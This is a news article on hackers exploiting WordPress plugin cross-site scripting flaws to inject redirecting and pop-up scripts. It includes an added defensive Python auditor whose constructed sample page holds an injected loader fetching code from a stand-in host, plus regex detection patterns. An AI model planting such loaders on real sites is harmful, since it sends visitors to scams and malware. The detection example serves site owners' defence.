WordPress Plugin Flaws Exploited In Malicious Advertising Campaign


An ongoing malicious advertising campaign is exploiting several WordPress plugin vulnerabilities to redirect website visitors to malicious landing pages. Researchers at Wordfence said that they recently discovered hackers injecting code into websites with the vulnerable plugins in order to display unwanted popup ads, as well as redirect site visitors to tech support scam pages, malicious Android APKs and sketchy pharmaceutical ads. This type of attack is not new. By targeting a few recently disclosed WordPress plugin vulnerabilities, the hackers injected a JavaScript payload into the front end of a victim's site. These injections each contain a short script which sources additional code from one or more third-party URLs. That code is executed when a visitor opens the victim website.

Hackers exploited several recently disclosed WordPress plugin vulnerabilities, such as cross-site scripting flaws, to launch the attack. One of the targeted vulnerabilities is in the WordPress Coming Soon Page and Maintenance Mode plugin, which has more than 7,000 installations and helps users launch website maintenance pages. The plugin has a recently disclosed cross-site scripting vulnerability that enables a hacker to inject JavaScript or HTML code into the blog front end. While a patch is available, many websites running vulnerable versions (1.7.8 or below) have still not updated.


Several other vulnerabilities disclosed over the past few months were also exploited in earlier versions of the malicious advertising campaign. That includes a vulnerability in the Yellow Pencil Visual CSS Style Editor plugin, which has 30,000 installations, disclosed and patched in April, and a flaw in the Blog Designer plugin that was disclosed and patched in May. All of the plugins with vulnerabilities hackers are attempting to exploit either have patches available or have been discontinued by their developers and are unavailable for new installs.

Through exploiting these vulnerabilities, hackers were able to inject a JavaScript payload into the front end of victims' websites. The injections have a short script which sources additional code from third-party URLs, which is then executed when a visitor opens the victim website. When the third-party code executes in a visitor’s browser, it performs an initial redirect to a central domain, which then performs another redirect to a new destination based on a number of factors, notably the type of device in use by the redirected user. In addition to the redirects, hackers were able to inject pop-up ads into victims' sites. The pop-up injection JavaScript code was identified on domains directly associated with the hacker, but researchers said that they also found injections sourcing scripts from legitimate sites which were infected by the hacker by other means.
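
For site owners, the injection pattern described above (a short script that sources code from a third-party URL) can be checked for in a page's rendered HTML. The following is an added example, not code from Wordfence or from the original article; the allowlist, the host names and the sample page are constructed assumptions.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: hosts this site legitimately loads scripts from.
ALLOWED_HOSTS = {"www.example.com", "cdn.example.com"}
# Inline code that builds or writes a <script> element at runtime.
LOADER = re.compile(r"createElement\(\s*['\"]script['\"]\s*\)|document\.write\s*\(", re.I)
URL = re.compile(r"(?:https?:)?//[\w.-]+[^\s'\"<>]*", re.I)

class ScriptAudit(HTMLParser):
    def __init__(self, site_host):
        super().__init__()
        self.site_host, self.findings = site_host, []
        self._inline = None  # buffer while inside an inline <script>

    def _host(self, url):  # relative URLs resolve to the site itself
        return (urlparse(url).hostname or self.site_host).lower()

    def handle_starttag(self, tag, attrs):
        src = dict(attrs).get("src")
        if tag == "script" and src is None:
            self._inline = []
        elif tag == "script" and self._host(src) not in ALLOWED_HOSTS:
            self.findings.append(("external-src", self._host(src)))

    def handle_data(self, data):
        if self._inline is not None:
            self._inline.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._inline is not None:
            code, self._inline = "".join(self._inline), None
            if LOADER.search(code):
                hosts = {self._host(u) for u in URL.findall(code)} - ALLOWED_HOSTS
                self.findings += [("inline-loader", h) for h in sorted(hosts)]

def audit(html, site_host="www.example.com"):
    parser = ScriptAudit(site_host)
    parser.feed(html)
    parser.close()
    return parser.findings

# Constructed sample page: two legitimate scripts followed by two injected ones.
SAMPLE = """<script src="/wp-includes/js/jquery/jquery.min.js"></script>
<script src="https://cdn.example.com/theme.js"></script>
<script src='//ads.injected.example/p.js'></script>
<script>var s=document.createElement('script');s.src='https://redirect.injected.example/t.js';document.head.appendChild(s);</script>
"""
```

Calling `audit(SAMPLE)` reports the off-allowlist script source and the inline loader's target host; a page that only loads scripts from allowlisted hosts returns an empty list.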

Plugins continue to be a security hole in WordPress. According to an Imperva report, almost 98 percent of WordPress vulnerabilities are related to plugins that extend the functionality and features of a website or a blog. Other WordPress plugins with recently found vulnerabilities include WP Live Chat and Yuzo Related Posts. While the total number of infected websites is unknown, it’s reasonable to expect anyone affected by a newly disclosed XSS flaw in the near future to be at risk. Some plugins hackers are attacking have been removed from the official repository, which makes version install counts hard to assess, and some were never there in the first place. The hackers still probe for months-old vulnerabilities, but quickly adopt new ones as they're being disclosed.